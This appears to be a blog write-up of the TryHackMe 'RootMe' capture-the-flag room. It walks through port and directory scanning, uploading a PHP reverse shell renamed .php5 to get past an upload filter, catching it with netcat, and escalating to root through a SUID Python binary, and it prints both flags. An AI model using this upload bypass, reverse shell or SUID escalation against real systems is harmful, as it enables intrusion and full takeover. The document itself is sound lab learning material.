Challenges: RootMe (TryHackMe)

JebitokJebitok
3 min read

Table of contents

This article will cover the RootMe write-up under Challenges on THM.

Deploy the machine

Connect to the TryHackMe network and deploy the machine. If you don't know how to do this, complete the OpenVPN room first.

Reconnaissance

First, let's get information about the target.

Answer the questions below

  1. Scan the machine, how many ports are open? 2

    nmap -p- <ip_address>

  2. What version of Apache is running? 2.4.29
    curl http://<ip_address>/http

    Other command options to find the version of Apache running:
    curl -I <ip_address>

    nmap -sV -p 80,8080 <target-ip>

    nikto -h http://<IP>

  3. What service is running on port 22? ssh

  4. Find directories on the web server using the GoBuster tool.

    gobuster dir -u <ip_address> -w /usr/share/wordlists/dirb/common.txt

  5. What is the hidden directory? /panel/

    to check other files:

    gobuster dir -u http://<ip_address> -w /usr/share/wordlists/dirb/common.txt -x php,txt,html

Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

Answer the questions below

user.txt - The hint: Search for "file upload bypass" and "PHP reverse shell".

THM{y0u_g0t_a_sh3ll}

  • Copy the /usr/share/webshells/php/php-reverse-shell.php file into a new file, e.g, shell.php5

$ cp /usr/share/webshells/php/php-reverse-shell.php shell.php5

$ nc -lvnp 4444 // on a different tab

  • Change the IP_Address to match the attack box IP, and also change the port to match the port you’ve started to listen on

  • Visit the http://ip_address/panel Then upload the shell.php5

  • If you upload a .PHP file, an alert ‘PHP not allowed’ will pop up, and if it’s a .png or .jpg file, is upload success alert will show, but it won’t open or reverse the shell. They php5 will reverse the shell. Under the $ nc -lvnp 4444 tab and you’ll be able to access the user.txt file, which has the flag

  • Check the tab that has nc -lvnp 4444, and the shell has been reversed

$ find / -type f -name user.txt 2> /dev/null

$ cat /var/www/user.txt

Privilege escalation

Now that we have a shell, let's escalate our privileges to root.

Answer the questions below

  1. Search for files with SUID permission, which file is weird? /usr/bin/python

find / -user root -perm /4000

  1. Find a form to escalate your privileges.
    Visit gfobins under SUID - Python

  2. root.txt THM{pr1v1l3g3_3sc4l4t10n}

    $ python3 -c 'import pty; pty.spawn("/bin/bash")'

    www-data@rootme:/$ cd /tmp

    www-data@rootme:/tmp$ cp /usr/bin/python ./python

    www-data@rootme:/tmp$ chmod u+s python

    www-data@rootme:/tmp$ /usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'

    # whoami

    # cat /root/root.txt

Thank you for reading my article. Please leave any questions or comments on improving my learning journey and the THM challenges.

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

CTFtryhackmeWrite Upreverse-shellPrivilege Escalation

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.